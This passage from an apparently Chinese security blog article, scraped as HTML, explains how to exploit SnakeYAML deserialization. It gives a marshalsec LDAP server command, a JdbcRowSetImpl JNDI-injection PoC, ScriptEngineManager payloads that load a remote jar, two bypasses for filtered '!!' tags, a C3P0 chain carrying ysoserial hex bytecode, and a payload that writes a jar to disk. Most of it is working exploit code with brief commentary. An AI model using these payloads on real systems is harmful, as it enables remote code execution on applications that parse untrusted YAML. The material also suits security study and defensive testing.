src="https://wechat2rss.xlab.app/img-proxy/?k=eda7c976&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9fh9xqjnYrcVKX9El7sYHrEKCYX3ZzovqASicC71rwqTkCwmauX2ibWGiaHKsibXWs6xEI4Symy2rUhKw%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="font-size: 15px;">使用marshalsec创建ldap服务引用远程恶意类</span></p><section class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"><li></li></ul><pre class="code-snippet__js" data-lang="nginx"><code><span class="code-snippet_outer">java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer <a href="http://127.0.0.1:8000/#calc" target="_blank">http://127.0.0.1:8000/#calc</a> 9999</span></code></pre></section><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.12889983579638753" data-s="300,640" style="" data-type="png" data-w="1218" src="https://wechat2rss.xlab.app/img-proxy/?k=362aab2f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9fh9xqjnYrcVKX9El7sYHrEsGXpZqdAo01VB468d0nZB12g2C6ZPzJfzUYTAEUXBhFw6jw60qRaVA%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="font-size: 15px;letter-spacing: 0.034em;">POC</span><br/></p><section class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li></ul><pre class="code-snippet__js" data-lang="java"><code><span class="code-snippet_outer">package com.yamlAttack;</span></code><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer">import org.yaml.snakeyaml.Yaml;</span></code><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer">public class SnakeYamlGadgets</span></code><code><span class="code-snippet_outer">{</span></code><code><span class="code-snippet_outer">    public static void main( String[] args )</span></code><code><span class="code-snippet_outer">{</span></code><code><span class="code-snippet_outer">        Yaml yaml=new Yaml();</span></code><code><span class="code-snippet_outer">        yaml.load(&#34;!!com.sun.rowset.JdbcRowSetImpl {dataSourceName: &#39;ldap://127.0.0.1:9999/Evil&#39;, autoCommit: true}&#34;);</span></code><code><span class="code-snippet_outer">    }</span></code><code><span class="code-snippet_outer">}</span></code></pre></section><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.5911401597676107" data-s="300,640" style="" data-type="png" data-w="1377" src="https://wechat2rss.xlab.app/img-proxy/?k=c27cfd45&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9fh9xqjnYrcVKX9El7sYHrE6JZ2PURXAkUacthnjtfKnJZ9iaJokyJZOcAXnF6NE4VsPVm3BJex2yw%2F640%3Fwx_fmt%3Dpng"/></p><p><br/></p><article data-content="[{&#34;type&#34;:&#34;block&#34;,&#34;id&#34;:&#34;vNsF-1677904410662&#34;,&#34;name&#34;:&#34;heading&#34;,&#34;data&#34;:{&#34;level&#34;:&#34;h2&#34;},&#34;nodes&#34;:[{&#34;type&#34;:&#34;text&#34;,&#34;id&#34;:&#34;DdKO-1677904410661&#34;,&#34;leaves&#34;:[{&#34;text&#34;:&#34;原理分析&#34;,&#34;marks&#34;:[]}]}],&#34;state&#34;:{}},{&#34;type&#34;:&#34;block&#34;,&#34;id&#34;:&#34;i1OE-1677919672878&#34;,&#34;name&#34;:&#34;paragraph&#34;,&#34;data&#34;:{&#34;version&#34;:1},&#34;nodes&#34;:[{&#34;type&#34;:&#34;text&#34;,&#34;id&#34;:&#34;SeiJ-1677919672879&#34;,&#34;leaves&#34;:[{&#34;text&#34;:&#34;这条反序列化链的原理和&#34;,&#34;marks&#34;:[]},{&#34;text&#34;:&#34;Fastjson&#34;,&#34;marks&#34;:[{&#34;type&#34;:&#34;color&#34;,&#34;value&#34;:&#34;#FF0001&#34;},{&#34;type&#34;:&#34;backgroundColor&#34;,&#34;value&#34;:&#34;#FDEEEE&#34;}]},{&#34;text&#34;:&#34;中的&#34;,&#34;marks&#34;:[]},{&#34;text&#34;:&#34;JdbcRowSetImpl&#34;,&#34;marks&#34;:[{&#34;type&#34;:&#34;color&#34;,&#34;value&#34;:&#34;#FF0001&#34;},{&#34;type&#34;:&#34;backgroundColor&#34;,&#34;value&#34;:&#34;#FDEEEE&#34;}]},{&#34;text&#34;:&#34;链基本上一模一样，都是因为反序列化还原会调用对象&#34;,&#34;marks&#34;:[]},{&#34;text&#34;:&#34;setter&#34;,&#34;marks&#34;:[{&#34;type&#34;:&#34;color&#34;,&#34;value&#34;:&#34;#FF0001&#34;},{&#34;type&#34;:&#34;backgroundColor&#34;,&#34;value&#34;:&#34;#FDEEEE&#34;}]},{&#34;text&#34;:&#34;方法.&#34;,&#34;marks&#34;:[]}]}],&#34;state&#34;:{}}]"><p><span style="font-weight: bold;font-size: 17px;">原理分析</span></p><p><span style="font-size: 15px;">这条反序列化链的原理和<span style="color: rgb(255, 0, 1);background-color: rgb(253, 238, 238);">Fastjson</span>中的<span style="color: rgb(255, 0, 1);background-color: rgb(253, 238, 238);">JdbcRowSetImpl</span>链基本上一模一样，都是因为反序列化还原会调用对象<span style="color: rgb(255, 0, 1);background-color: rgb(253, 238, 238);">setter</span>方法，</span><span style="font-size: 15px;">这里反序列化调用<span style="color: rgb(255, 0, 1);font-size: 15px;letter-spacing: 0.578px;text-wrap: wrap;background-color: rgb(253, 238, 238);">setAutoCommit</span>方法进而执行connect操作接着实现JNDI注入。</span></p><p><span style="font-size: 15px;"><br/></span></p><p><span style="font-size: 15px;"><br/></span></p></article><p><br/></p><article data-content="[{&#34;type&#34;:&#34;block&#34;,&#34;id&#34;:&#34;uLGS-1677922405736&#34;,&#34;name&#34;:&#34;heading&#34;,&#34;data&#34;:{&#34;level&#34;:&#34;h1&#34;},&#34;nodes&#34;:[{&#34;type&#34;:&#34;text&#34;,&#34;id&#34;:&#34;vnhS-1677922405735&#34;,&#34;leaves&#34;:[{&#34;text&#34;:&#34;绕过!!被过滤&#34;,&#34;marks&#34;:[]}]}],&#34;state&#34;:{}},{&#34;type&#34;:&#34;block&#34;,&#34;id&#34;:&#34;RHpm-1677922422708&#34;,&#34;name&#34;:&#34;heading&#34;,&#34;data&#34;:{&#34;level&#34;:&#34;h2&#34;},&#34;nodes&#34;:[{&#34;type&#34;:&#34;text&#34;,&#34;id&#34;:&#34;GjVV-1677922422709&#34;,&#34;leaves&#34;:[{&#34;text&#34;:&#34;使用等价字符替换&#34;,&#34;marks&#34;:[{&#34;type&#34;:&#34;bold&#34;},{&#34;type&#34;:&#34;fontSize&#34;,&#34;value&#34;:22}]}]}]}]"><p><span style="font-weight: bold;font-size: 20px;">绕过!!被过滤</span></p><p><span style="font-weight: bold;font-size: 18px;">使用等价字符替换</span></p><section class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"><li></li><li></li><li></li><li></li><li></li></ul><pre class="code-snippet__js" data-lang="properties"><code><span class="code-snippet_outer"><span class="code-snippet__comment">!&lt;tag:yaml.org,2002:javax.script.ScriptEngineManager&gt; [</span></span></code><code><span class="code-snippet_outer"><span class="code-snippet__comment">    !!java.net.URLClassLoader [[</span></span></code><code><span class="code-snippet_outer"><span class="code-snippet__comment">        !!java.net.URL [&#34;<a href="http://127.0.0.1:8000/yaml-payload.jar" target="_blank">http://127.0.0.1:8000/yaml-payload.jar</a>&#34;]</span></span></code><code><span class="code-snippet_outer">    <span class="code-snippet__attr">]]</span></span></code><code><span class="code-snippet_outer"><span class="code-snippet__attr">]</span></span></code></pre></section></article><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.2680577849117175" data-s="300,640" style="" data-type="png" data-w="1869" src="https://wechat2rss.xlab.app/img-proxy/?k=1d607094&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9fh9xqjnYrcVKX9El7sYHrELuw6TxX8mqysqMP1u6cvnvfF0NvhcyibM4x2Hcicd6JiaKUogZblSeQ9w%2F640%3Fwx_fmt%3Dpng"/></p><section class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li></ul><pre class="code-snippet__js" data-lang="cpp"><code><span class="code-snippet_outer"><span class="code-snippet__keyword">import</span> org.yaml.snakeyaml.Yaml;</span></code><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer"><span class="code-snippet__keyword">public</span> <span class="code-snippet__class"><span class="code-snippet__keyword">class</span> <span class="code-snippet__title">ByPass</span> {</span></span></code><code><span class="code-snippet_outer">    <span class="code-snippet__function"><span class="code-snippet__keyword">public</span> <span class="code-snippet__keyword">static</span> <span class="code-snippet__keyword">void</span> <span class="code-snippet__title">main</span><span class="code-snippet__params">(String[] args)</span> </span>{</span></code><code><span class="code-snippet_outer">        Yaml yaml=<span class="code-snippet__keyword">new</span> Yaml();</span></code><code><span class="code-snippet_outer">        String payload=<span class="code-snippet__string">&#34;!&lt;tag:yaml.org,2002:javax.script.ScriptEngineManager&gt; [\n&#34;</span> +</span></code><code><span class="code-snippet_outer">                <span class="code-snippet__string">&#34;  !!java.net.URLClassLoader [[\n&#34;</span> +</span></code><code><span class="code-snippet_outer">                <span class="code-snippet__string">&#34;    !!java.net.URL [\&#34;<a href="http://127.0.0.1:8000/yaml-payload.jar\" target="_blank">http://127.0.0.1:8000/yaml-payload.jar\</a>&#34;]\n&#34;</span> +</span></code><code><span class="code-snippet_outer">                <span class="code-snippet__string">&#34;  ]]\n&#34;</span> +</span></code><code><span class="code-snippet_outer">                <span class="code-snippet__string">&#34;]&#34;</span>;</span></code><code><span class="code-snippet_outer">        yaml.load(payload);</span></code><code><span class="code-snippet_outer">    }</span></code><code><span class="code-snippet_outer">}</span></code></pre></section><article data-content="[{&#34;type&#34;:&#34;block&#34;,&#34;id&#34;:&#34;zcTG-1677922714403&#34;,&#34;name&#34;:&#34;heading&#34;,&#34;data&#34;:{&#34;level&#34;:&#34;h2&#34;},&#34;nodes&#34;:[{&#34;type&#34;:&#34;text&#34;,&#34;id&#34;:&#34;O6Ba-1677922714404&#34;,&#34;leaves&#34;:[{&#34;text&#34;:&#34;自定义Tag前缀&#34;,&#34;marks&#34;:[{&#34;type&#34;:&#34;bold&#34;},{&#34;type&#34;:&#34;fontSize&#34;,&#34;value&#34;:22}]}]}]}]"><p><span style="font-weight: bold;font-size: 18px;">自定义Tag前缀</span></p><section class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li></ul><pre class="code-snippet__js" data-lang="properties"><code><span class="code-snippet_outer"><span class="code-snippet__meta">%TAG</span> <span class="code-snippet__string">!      tag:yaml.org,2002:</span></span></code><code><span class="code-snippet_outer"><span class="code-snippet__attr">---</span></span></code><code><span class="code-snippet_outer"><span class="code-snippet__comment">!javax.script.ScriptEngineManager [</span></span></code><code><span class="code-snippet_outer"><span class="code-snippet__comment">    !!java.net.URLClassLoader [[</span></span></code><code><span class="code-snippet_outer"><span class="code-snippet__comment">        !!java.net.URL [&#34;<a href="http://127.0.0.1:8000/yaml-payload.jar" target="_blank">http://127.0.0.1:8000/yaml-payload.jar</a>&#34;]</span></span></code><code><span class="code-snippet_outer">    <span class="code-snippet__attr">]]</span></span></code><code><span class="code-snippet_outer"><span class="code-snippet__attr">]</span></span></code><code><span class="code-snippet_outer"><span class="code-snippet__meta">//</span> <span class="code-snippet__string">记得不要漏了---</span></span></code></pre></section><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.09458720612356479" data-s="300,640" style="" data-type="png" data-w="1829" src="https://wechat2rss.xlab.app/img-proxy/?k=5cbab5f5&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9fh9xqjnYrcVKX9El7sYHrEArBibCv07zxmMiaMho5Zib9CYRY2X2zibFJYmibyKN8q9fN98vH3bgspJ7w%2F640%3Fwx_fmt%3Dpng"/></p><section class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li></ul><pre class="code-snippet__js" data-lang="cpp"><code><span class="code-snippet_outer"><span class="code-snippet__keyword">import</span> org.yaml.snakeyaml.Yaml;</span></code><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer"><span class="code-snippet__keyword">public</span> <span class="code-snippet__class"><span class="code-snippet__keyword">class</span> <span class="code-snippet__title">ByPass</span> {</span></span></code><code><span class="code-snippet_outer">    <span class="code-snippet__function"><span class="code-snippet__keyword">public</span> <span class="code-snippet__keyword">static</span> <span class="code-snippet__keyword">void</span> <span class="code-snippet__title">main</span><span class="code-snippet__params">(String[] args)</span> </span>{</span></code><code><span class="code-snippet_outer">        Yaml yaml=<span class="code-snippet__keyword">new</span> Yaml();</span></code><code><span class="code-snippet_outer">        <span class="code-snippet__comment">// 定义!代表tag:yaml.org,2002:</span></span></code><code><span class="code-snippet_outer">        String payload=<span class="code-snippet__string">&#34;%TAG !      tag:yaml.org,2002:\n&#34;</span>+</span></code><code><span class="code-snippet_outer">                <span class="code-snippet__string">&#34;---\n&#34;</span>+</span></code><code><span class="code-snippet_outer">                <span class="code-snippet__string">&#34;!javax.script.ScriptEngineManager [\n&#34;</span> +</span></code><code><span class="code-snippet_outer">                <span class="code-snippet__string">&#34;  !!java.net.URLClassLoader [[\n&#34;</span> +</span></code><code><span class="code-snippet_outer">                <span class="code-snippet__string">&#34;    !!java.net.URL [\&#34;<a href="http://127.0.0.1:8000/yaml-payload.jar\" target="_blank">http://127.0.0.1:8000/yaml-payload.jar\</a>&#34;]\n&#34;</span> +</span></code><code><span class="code-snippet_outer">                <span class="code-snippet__string">&#34;  ]]\n&#34;</span> +</span></code><code><span class="code-snippet_outer">                <span class="code-snippet__string">&#34;]&#34;</span>;</span></code><code><span class="code-snippet_outer">        yaml.load(payload);</span></code><code><span class="code-snippet_outer">    }</span></code><code><span class="code-snippet_outer">}</span></code></pre></section><article data-content="[{&#34;type&#34;:&#34;block&#34;,&#34;id&#34;:&#34;164v-1677922923322&#34;,&#34;name&#34;:&#34;heading&#34;,&#34;data&#34;:{&#34;level&#34;:&#34;h2&#34;},&#34;nodes&#34;:[{&#34;type&#34;:&#34;text&#34;,&#34;id&#34;:&#34;nn3T-1677922923323&#34;,&#34;leaves&#34;:[{&#34;text&#34;:&#34;参考&#34;,&#34;marks&#34;:[]}]}],&#34;state&#34;:{}},{&#34;type&#34;:&#34;block&#34;,&#34;id&#34;:&#34;yzdZ-1677922795936&#34;,&#34;name&#34;:&#34;paragraph&#34;,&#34;data&#34;:{&#34;version&#34;:1},&#34;nodes&#34;:[{&#34;type&#34;:&#34;text&#34;,&#34;id&#34;:&#34;o5Ch-1677922795937&#34;,&#34;leaves&#34;:[{&#34;text&#34;:&#34;&#34;,&#34;marks&#34;:[]}]},{&#34;type&#34;:&#34;inline&#34;,&#34;id&#34;:&#34;yzor-1677922796242&#34;,&#34;name&#34;:&#34;link&#34;,&#34;data&#34;:{&#34;href&#34;:&#34;https://yaml.org/spec/1.1/#id858600&#34;},&#34;nodes&#34;:[{&#34;type&#34;:&#34;text&#34;,&#34;id&#34;:&#34;wb8J-1677922796241&#34;,&#34;leaves&#34;:[{&#34;text&#34;:&#34;https://yaml.org/spec/1.1/#id858600&#34;,&#34;marks&#34;:[]}]}]},{&#34;type&#34;:&#34;text&#34;,&#34;id&#34;:&#34;fJ1n-1677922796243&#34;,&#34;leaves&#34;:[{&#34;text&#34;:&#34;&#34;,&#34;marks&#34;:[]}]}],&#34;state&#34;:{}}]"><p><span style="font-weight: bold;font-size: 18px;">参考</span></p><p><span style="color: rgb(0, 56, 132);font-size: 15px;"><a href="https://yaml.org/spec/1.1/#id858600" target="_blank">https://yaml.org/spec/1.1/#id858600</a></span></p></article><p><br/></p><p><span style="font-weight: bold;font-size: 18px;"></span></p></article><p><br/></p><p><br/></p><article><p><span style="font-weight: bold;font-size: 20px;">不出网情况</span></p><p><span style="font-weight: bold;font-size: 15px;">C3P0链</span></p><p><span style="font-size: 15px;">Fastjson中可以用<span style="font-size: 15px;color: rgb(255, 0, 1);background-color: rgb(253, 238, 238);">C3P0.WrapperConnectionPoolDataSource</span>对<span style="font-size: 15px;color: rgb(255, 0, 1);background-color: rgb(253, 238, 238);">HEX</span>序列化字节码进而实现本地调用，<span style="font-size: 15px;color: rgb(255, 0, 1);background-color: rgb(253, 238, 238);">snakeyaml</span>同理。</span></p><section class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"><li></li><li></li></ul><pre class="code-snippet__js" data-lang="css"><code><span class="code-snippet_outer">// <span class="code-snippet__selector-tag">CommonsCollections5</span>为反序列化链,具体情况视目标环境而定</span></code><code><span class="code-snippet_outer"><span class="code-snippet__selector-tag">java</span> <span class="code-snippet__selector-tag">-jar</span> <span class="code-snippet__selector-tag">ysoserial-0</span><span class="code-snippet__selector-class">.0</span><span class="code-snippet__selector-class">.5</span><span class="code-snippet__selector-class">.jar</span> <span class="code-snippet__selector-tag">CommonsCollections5</span> &#34;<span class="code-snippet__selector-tag">calc</span>&#34; &gt; 1<span class="code-snippet__selector-class">.txt</span></span></code></pre></section><p><span style="letter-spacing: 0.034em;font-size: 15px;">将字节码文件转为16进制，传入payload中，即可进行恶意字节码加载</span><br/></p><section class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"><li></li><li></li></ul><pre class="code-snippet__js" data-lang="properties"><code><span class="code-snippet_outer"><span class="code-snippet__comment">!!com.mchange.v2.c3p0.WrapperConnectionPoolDataSource</span></span></code><code><span class="code-snippet_outer"><span class="code-snippet__attr">userOverridesAsString</span>:<span class="code-snippet__string"> &#39;HexAsciiSerializedMap:16进制数据;&#39;</span></span></code></pre></section><article data-content="[{&#34;type&#34;:&#34;block&#34;,&#34;id&#34;:&#34;ewmq-1677923951341&#34;,&#34;name&#34;:&#34;paragraph&#34;,&#34;data&#34;:{&#34;version&#34;:1},&#34;nodes&#34;:[{&#34;type&#34;:&#34;text&#34;,&#34;id&#34;:&#34;6Juc-1677923951340&#34;,&#34;leaves&#34;:[{&#34;text&#34;:&#34;POC:&#34;,&#34;marks&#34;:[]}]}],&#34;state&#34;:{}}]"><p><span style="font-size: 15px;">POC</span></p><section class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li></ul><pre class="code-snippet__js" data-lang="cs"><code><span class="code-snippet_outer"><span class="code-snippet__keyword">public</span> <span class="code-snippet__keyword">class</span> <span class="code-snippet__title">SnakeYaml</span> {</span></code><code><span class="code-snippet_outer">    <span class="code-snippet__function"><span class="code-snippet__keyword">public</span> <span class="code-snippet__keyword">static</span> <span class="code-snippet__keyword">void</span> <span class="code-snippet__title">main</span>(<span class="code-snippet__params">String[] args</span>)</span> {</span></code><code><span class="code-snippet_outer">        String payload = <span class="code-snippet__string">&#34;!!com.mchange.v2.c3p0.WrapperConnectionPoolDataSource\n&#34;</span> +</span></code><code><span class="code-snippet_outer">                <span class="code-snippet__string">&#34;userOverridesAsString: &#39;HexAsciiSerializedMap:16进制数据;&#39;&#34;</span>;</span></code><code><span class="code-snippet_outer">        Yaml yaml = <span class="code-snippet__keyword">new</span> Yaml();</span></code><code><span class="code-snippet_outer">        yaml.load(payload);</span></code><code><span class="code-snippet_outer">    }</span></code><code><span class="code-snippet_outer">}</span></code></pre></section><article data-content="[{&#34;type&#34;:&#34;block&#34;,&#34;id&#34;:&#34;7Mz4-1677923945719&#34;,&#34;name&#34;:&#34;heading&#34;,&#34;data&#34;:{&#34;level&#34;:&#34;h2&#34;},&#34;nodes&#34;:[{&#34;type&#34;:&#34;text&#34;,&#34;id&#34;:&#34;LdAn-1677923945717&#34;,&#34;leaves&#34;:[{&#34;text&#34;:&#34;本地写入Jar实现加载Payload&#34;,&#34;marks&#34;:[]}]}],&#34;state&#34;:{}},{&#34;type&#34;:&#34;block&#34;,&#34;id&#34;:&#34;vqtk-1677924190063&#34;,&#34;name&#34;:&#34;paragraph&#34;,&#34;data&#34;:{&#34;version&#34;:1},&#34;nodes&#34;:[{&#34;type&#34;:&#34;text&#34;,&#34;id&#34;:&#34;8ygO-1677924190062&#34;,&#34;leaves&#34;:[{&#34;text&#34;:&#34;在&#34;,&#34;marks&#34;:[]},{&#34;text&#34;:&#34;fastjson&#34;,&#34;marks&#34;:[{&#34;type&#34;:&#34;color&#34;,&#34;value&#34;:&#34;#FF0001&#34;},{&#34;type&#34;:&#34;backgroundColor&#34;,&#34;value&#34;:&#34;#FDEEEE&#34;}]},{&#34;text&#34;:&#34;中，可以通过如下命令进行文件写入，而&#34;,&#34;marks&#34;:[]},{&#34;text&#34;:&#34;snakeyaml&#34;,&#34;marks&#34;:[{&#34;type&#34;:&#34;color&#34;,&#34;value&#34;:&#34;#FF0001&#34;},{&#34;type&#34;:&#34;backgroundColor&#34;,&#34;value&#34;:&#34;#FDEEEE&#34;}]},{&#34;text&#34;:&#34;利用方式在很多方面都有很大的相似之处&#34;,&#34;marks&#34;:[]}]}],&#34;state&#34;:{}}]"><p><span style="font-weight: bold;font-size: 18px;">本地写入Jar实现加载Payload</span></p><p><span style="font-size: 15px;">其实<span style="color: rgb(255, 0, 1);font-size: 15px;letter-spacing: 0.578px;text-wrap: wrap;background-color: rgb(253, 238, 238);">snakeyaml</span>和<span style="font-size: 15px;color: rgb(255, 0, 1);background-color: rgb(253, 238, 238);">fastjson</span>基本上差不多，只是序列化数据表现形式存在区别，不过相关特性高度相似，所以<span style="color: rgb(255, 0, 1);font-size: 15px;letter-spacing: 0.578px;text-wrap: wrap;background-color: rgb(253, 238, 238);">fast</span><span style="color: rgb(255, 0, 1);font-size: 15px;letter-spacing: 0.578px;text-wrap: wrap;background-color: rgb(253, 238, 238);">json</span>中大部分利用链都可以转化为<span style="color: rgb(255, 0, 1);font-size: 15px;letter-spacing: 0.578px;text-wrap: wrap;background-color: rgb(253, 238, 238);">snakeya</span><span style="color: rgb(255, 0, 1);font-size: 15px;letter-spacing: 0.578px;text-wrap: wrap;background-color: rgb(253, 238, 238);">ml</span>形式</span></p><section class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li></ul><pre class="code-snippet__js" data-lang="json"><code><span class="code-snippet_outer">{</span></code><code><span class="code-snippet_outer">  <span class="code-snippet__attr">&#34;@type&#34;</span>: <span class="code-snippet__string">&#34;java.lang.AutoCloseable&#34;</span>,</span></code><code><span class="code-snippet_outer">  <span class="code-snippet__attr">&#34;@type&#34;</span>: <span class="code-snippet__string">&#34;sun.rmi.server.MarshalOutputStream&#34;</span>,</span></code><code><span class="code-snippet_outer">  <span class="code-snippet__attr">&#34;out&#34;</span>: {</span></code><code><span class="code-snippet_outer">    <span class="code-snippet__attr">&#34;@type&#34;</span>: <span class="code-snippet__string">&#34;java.util.zip.InflaterOutputStream&#34;</span>,</span></code><code><span class="code-snippet_outer">    <span class="code-snippet__attr">&#34;out&#34;</span>: {</span></code><code><span class="code-snippet_outer">      <span class="code-snippet__attr">&#34;@type&#34;</span>: <span class="code-snippet__string">&#34;java.io.FileOutputStream&#34;</span>,</span></code><code><span class="code-snippet_outer">      <span class="code-snippet__attr">&#34;file&#34;</span>: <span class="code-snippet__string">&#34;dst&#34;</span>,</span></code><code><span class="code-snippet_outer">      <span class="code-snippet__attr">&#34;append&#34;</span>: <span class="code-snippet__string">&#34;false&#34;</span></span></code><code><span class="code-snippet_outer">    },</span></code><code><span class="code-snippet_outer">    <span class="code-snippet__attr">&#34;infl&#34;</span>: {</span></code><code><span class="code-snippet_outer">      <span class="code-snippet__attr">&#34;input&#34;</span>: <span class="code-snippet__string">&#34;eJwL8nUyNDJSyCxWyEgtSgUAHKUENw==&#34;</span></span></code><code><span class="code-snippet_outer">    },</span></code><code><span class="code-snippet_outer">    <span class="code-snippet__attr">&#34;bufLen&#34;</span>: <span class="code-snippet__number">1048576</span></span></code><code><span class="code-snippet_outer">  },</span></code><code><span class="code-snippet_outer">  <span class="code-snippet__attr">&#34;protocolVersion&#34;</span>: <span class="code-snippet__number">1</span></span></code><code><span class="code-snippet_outer">}</span></code></pre></section></article><p><span style="letter-spacing: 0.034em;font-size: 15px;">Payload</span><br/></p><section class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"><li></li></ul><pre class="code-snippet__js" data-lang="css"><code><span class="code-snippet_outer">!!<span class="code-snippet__selector-tag">sun</span><span class="code-snippet__selector-class">.rmi</span><span class="code-snippet__selector-class">.server</span><span class="code-snippet__selector-class">.MarshalOutputStream</span> <span class="code-snippet__selector-attr">[!!java.util.zip.InflaterOutputStream [!!java.io.FileOutputStream [!!java.io.File [&#34;filePath&#34;]</span>,<span class="code-snippet__selector-tag">false</span>],!!<span class="code-snippet__selector-tag">java</span><span class="code-snippet__selector-class">.util</span><span class="code-snippet__selector-class">.zip</span><span class="code-snippet__selector-class">.Inflater</span>  { <span class="code-snippet__attribute">input</span>: !!binary base64 },1048576]]</span></code></pre></section><article data-content="[{&#34;type&#34;:&#34;block&#34;,&#34;id&#34;:&#34;oih1-1677924253201&#34;,&#34;name&#34;:&#34;paragraph&#34;,&#34;data&#34;:{&#34;version&#34;:1},&#34;nodes&#34;:[{&#34;type&#34;:&#34;text&#34;,&#34;id&#34;:&#34;WS5t-1677924253200&#34;,&#34;leaves&#34;:[{&#34;text&#34;:&#34;filepath&#34;,&#34;marks&#34;:[{&#34;type&#34;:&#34;color&#34;,&#34;value&#34;:&#34;#FF0001&#34;},{&#34;type&#34;:&#34;backgroundColor&#34;,&#34;value&#34;:&#34;#FDEEEE&#34;}]},{&#34;text&#34;:&#34;是写入路径，&#34;,&#34;marks&#34;:[]},{&#34;text&#34;:&#34;base64&#34;,&#34;marks&#34;:[{&#34;type&#34;:&#34;color&#34;,&#34;value&#34;:&#34;#FF0001&#34;},{&#34;type&#34;:&#34;backgroundColor&#34;,&#34;value&#34;:&#34;#FDEEEE&#34;}]},{&#34;text&#34;:&#34;是我们要写入文件的&#34;,&#34;marks&#34;:[]},{&#34;text&#34;:&#34;base64&#34;,&#34;marks&#34;:[{&#34;type&#34;:&#34;color&#34;,&#34;value&#34;:&#34;#FF0001&#34;},{&#34;type&#34;:&#34;backgroundColor&#34;,&#34;value&#34;:&#34;#FDEEEE&#34;}]},{&#34;text&#34;:&#34;编码&#34;,&#34;marks&#34;:[]}]}],&#34;state&#34;:{}}]"><p><span style="font-size: 15px;"><span style="font-size: 15px;color: rgb(255, 0, 1);background-color: rgb(253, 238, 238);">filepath</span>是写入路径，<span style="font-size: 15px;color: rgb(255, 0, 1);background-color: rgb(253, 238, 238);">base64</span>是我们要写入文件的<span style="font-size: 15px;color: rgb(255, 0, 1);background-color: rgb(253, 238, 238);">base64</span>编码</span></p><section class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li></ul><pre class="code-snippet__js" data-lang="java"><code><span class="code-snippet_outer"><span class="code-snippet__keyword">package</span> snakeYaml;</span></code><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer"><span class="code-snippet__keyword">import</span> org.yaml.snakeyaml.Yaml;</span></code><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer"><span class="code-snippet__keyword">public</span> <span class="code-snippet__class"><span class="code-snippet__keyword">class</span> <span class="code-snippet__title">SnakeYaml</span> </span>{</span></code><code><span class="code-snippet_outer">    <span class="code-snippet__function"><span class="code-snippet__keyword">public</span> <span class="code-snippet__keyword">static</span> <span class="code-snippet__keyword">void</span> <span class="code-snippet__title">main</span><span class="code-snippet__params">(String[] args)</span> </span>{</span></code><code><span class="code-snippet_outer">        String payload = <span class="code-snippet__string">&#34;!!sun.rmi.server.MarshalOutputStream [!!java.util.zip.InflaterOutputStream [!!java.io.FileOutputStream [!!java.io.File [\&#34;./yaml-payload.jar\&#34;],false],!!java.util.zip.Inflater  { input: !!binary 